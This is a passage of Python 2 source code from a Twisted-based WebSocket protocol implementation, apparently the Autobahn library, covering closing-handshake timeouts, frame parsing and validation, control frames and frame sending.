self.serverConnectionDropTimeoutCall = reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_PROXY_CONNECTING, STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
We (a client) expected the peer (a server) to drop the connection,
but it didn't (in time self.serverConnectionDropTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.serverConnectionDropTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
We expected the peer to complete the opening handshake with to us.
It didn't do so (in time self.openHandshakeTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.openHandshakeTimeoutCall = None
if self.state in [WebSocketProtocol.STATE_CONNECTING, WebSocketProtocol.STATE_PROXY_CONNECTING]:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
We expected the peer to respond to us initiating a close handshake. It didn't
respond (in time self.closeHandshakeTimeout) with a close response frame though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.closeHandshakeTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
if abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSocket connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSocket closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSocket protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
Fired when invalid payload is encountered. Currently, this only happens
for text message when payload is invalid UTF-8 or close frames with
close reason that is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def setTrackTimings(self, enable):
"""
Enable/disable tracking of detailed timings.
:param enable: Turn time tracking on/off.
:type enable: bool
"""
if not hasattr(self, 'trackTimings') or self.trackTimings != enable:
self.trackTimings = enable
if self.trackTimings:
self.trackedTimings = Timings()
else:
self.trackedTimings = None
def doTrack(self, msg):
if not hasattr(self, 'trackTimings') or not self.trackTimings:
return
self.trackedTimings.track(msg)
def connectionMade(self):
"""
This is called by Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
## copy default options from factory (so we are not affected by changed on those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.setTrackTimings(self.factory.trackTimings)
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
if not self.isServer and self.factory.proxy is not None:
self.state = WebSocketProtocol.STATE_PROXY_CONNECTING
else:
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSocket closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# timers, which might get set up later, and remembered here to get canceled
# when appropriate
if not self.isServer:
self.serverConnectionDropTimeoutCall = None
self.openHandshakeTimeoutCall = None
self.closeHandshakeTimeoutCall = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
self.openHandshakeTimeoutCall = reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
This is called by Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
## cancel any server connection drop timer if present
##
if not self.isServer and self.serverConnectionDropTimeoutCall is not None:
if self.debugCodePaths:
log.msg("serverConnectionDropTimeoutCall.cancel")
self.serverConnectionDropTimeoutCall.cancel()
self.serverConnectionDropTimeoutCall = None
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
This is called by Twisted framework upon receiving data on TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## need to establish proxy connection
##
elif self.state == WebSocketProtocol.STATE_PROXY_CONNECTING:
self.processProxyConnect()
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processProxyConnect(self):
"""
Process proxy connect.
Modes: Hybi, Hixie
"""
raise Exception("must implement proxy connect (client or server) in derived class")
def processHandshake(self):
"""
Process WebSocket handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
Send out stuff from send queue. For details how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol._QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
Wrapper for self.transport.write which allows to give a chopsize.
When asked to chop up writing to TCP stream, we write only chopsize octets
and then give up control to select() in underlying reactor so that bytes
get onto wire immediately. Note that this is different from and unrelated
to WebSocket data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
def processData(self):
"""
After WebSocket handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
self.onCloseFrame(None, None)
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
## need minimum of 2 octets to for new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
self.current_frame_masker = createXorMasker(frame_mask, frame_payload_len)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
## reprocess when frame has no payload or and buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
if self.trackedTimings:
self.trackedTimings.track("onMessageBegin")
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
This method deliberately allows to send invalid frames (that is frames invalid
per-se, or frames invalid because of protocol state). Other than in fuzzing servers,
calling methods will ensure that no invalid frames are sent.
In addition, this method supports explicit specification of payload length.
When payload_len is given, it will always write that many octets to the stream.
It'll wrap within payload, resending parts of that when more octets were requested
The use case is again for fuzzing server which want to sent increasing amounts
of payload data to peers without having to construct potentially large messges
themselfes.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
masker = createXorMasker(mask, l)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
def sendPing(self, payload = None):
"""
Send out Ping to peer. A peer is expected to Pong back the payload a soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
Send a close frame and update protocol state. Note, that this is
an internal method which deliberately allows not send close
frame with invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state in [WebSocketProtocol.STATE_PROXY_CONNECTING, WebSocketProtocol.STATE_CONNECTING]:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe and self.closeHandshakeTimeout > 0:
self.closeHandshakeTimeoutCall = reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
:param reason: An optional close reason (a string that when present, a status code MUST also be present).
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
